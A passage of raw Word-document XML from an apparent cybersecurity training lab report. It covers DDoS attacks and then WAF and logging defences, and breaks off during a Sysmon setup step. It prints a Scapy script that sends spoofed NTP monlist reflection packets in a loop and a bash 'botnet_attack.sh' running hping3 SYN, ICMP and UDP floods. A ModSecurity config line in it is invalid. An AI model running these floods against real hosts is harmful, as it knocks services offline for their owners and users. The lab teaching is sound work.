                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t># Forge legacy monlist query payload via raw byte construction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>ntp_monlist = Raw(load=b'\x17\x00\x03\x2a' + b'\x00'*4)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>packet = IP(src=victim, dst=ntp_server)/UDP(sport=123, dport=123)/ntp_monlist</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>print(f"Injecting spoofed NTP monlist packets targeting {victim}...")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>send(packet, loop=1, inter=0.01, verbose=0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="376C08AA" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359D2A98" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.2 Coordinated Multi-Bot Attack Bash Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F740A5" w14:textId="6977CD1A" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>A synchronized shell matrix script was deployed across all active attacker machines to generate a multi-vector resource exhaustion event against the Windows server (SYN flood, ICMP flood, and high-intensity UDP saturation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F4AD2" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2787D232" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5509E7" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B09E71" w14:textId="04192E3E" w:rsidR="00010BDF" w:rsidRDefault="00010BDF">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570BCF13" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484FB9F1" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="73853D3F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7ABB0394" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>#!/bin/bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t># botnet_attack.sh - Coordinated Multi-Vector Resource Saturation Script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>VICTIM="192.168.56.102"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>ATTACK_TYPE=$1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>echo "[SYSTEM] Initializing Coordinated Distributed Botnet Layer: $ATTACK_TYPE against $VICTIM"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>case $ATTACK_TYPE in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    syn)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        # Launching stateless TCP SYN flooding with randomized source IPs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        sudo hping3 --syn -p 80 --flood --rand-source $VICTIM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        ;;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    icmp)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        # Initiating raw ICMP echo request saturation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        sudo hping3 --icmp-flood $VICTIM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        ;;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    udp)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        # Executing high-intensity Layer 4 UDP flood</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        sudo hping3 --udp -p 80 --flood $VICTIM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        ;;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    *)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        echo "Usage: $0 [syn | icmp | udp]"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        ;;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>esac</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="598B9D16" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>System Observations: During active execution, the Windows Task Manager and Resource Monitor registered instantaneous spikes to 100% CPU saturation. Inbound connection queues became entirely choked, and the IIS web application turned completely unresponsive to authentic connection requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346647E" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179" w:rsidP="00266179">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2431B4B0" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00266179">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5FEF6E" w14:textId="34044E04" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>6. Web Application Firewall (WAF) &amp; Traffic Mitigation Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71280D" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Defending modern application spaces requires high-end, real-time deep packet parsing structures that go far beyond standard stateful Layer 3/4 packet filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D937D4" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691A5370" w14:textId="21ED977C" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integration on Windows IIS Platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FFCBED" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Trainees executed a defensive infrastructure lab by installing ModSecurity (v2.9.7 win64 MSI) on the Windows IIS target. ModSecurity was bound directly to the IIS request pipeline as a native web server module, followed by the deployment of the OWASP Core Rule Set (CRS v4.5.0). This file layout was linked directly inside the web architecture via the structural web.config setup mapping:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="36F8AF5F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D3F0D94" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt;!-- Securing the underlying application server via native web.config intervention --&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>&lt;configuration&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    &lt;system.webServer&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        &lt;ModSecurity enabled="true" configFile="C:\CRS\owasp-crs\modsecurity_iis.conf" /&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    &lt;/system.webServer&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>&lt;/configuration&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D0F7774" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6CA9B9" w14:textId="0566842C" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.2 OWASP CRS Security Rule Definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB812B8" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The underlying modsecurity.conf engine was set to active interception mode to detect and block malicious web requests before they touch backend code layers:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="0B494B3F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4CB30811" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># modsecurity.conf Core Security Constraints</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>SecRuleEngine On</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>SecRequestBodyAccess On</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SecRuleEngine DetectionMode On</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>Include C:\CRS\owasp-crs\crs-setup.conf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>Include C:\CRS\owasp-crs\rules\*.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15D865EA" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>When web-based exploit strings (such as SQL Injection payloads or Cross-Site Scripting tags) were fired from Kali via curl, the server immediately intercepted the traffic and dropped the connection with an explicit HTTP 403 Forbidden response. Concurrently, the Windows Event Viewer and ModSecurity log subdirectories logged detailed intrusion telemetry strings detailing rule triggers (e.g., [id '941100'] [msg 'XSS Attack Detected']).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C03415" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03214648" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00266179"/>
    <w:p w14:paraId="306B079F" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00266179"/>
    <w:p w14:paraId="56D34A2D" w14:textId="2E91F4D9" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>7. Deep System Telemetry &amp; SOC Log Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D17B51" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>True cybersecurity maturity relies heavily on full host observability and automated threat logging across the entire computing fabric.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3974732C" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7.1 Microsoft Sysmon Deployment &amp; Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437320EC" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>To capture granular process activity, the Microsoft Sysinternals Sysmon utility was deployed on the Windows instance using an optimized, threat-aligned modular XML mapping structure (e.g., Olaf Hartong's sysmon-modular ruleset).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="7A6176B7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32C2E895" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Loading Sysmon under elevated privilege with explicit configuration rule structures</w:t>
            </w:r>
            <w:r>
              <w:rPr>
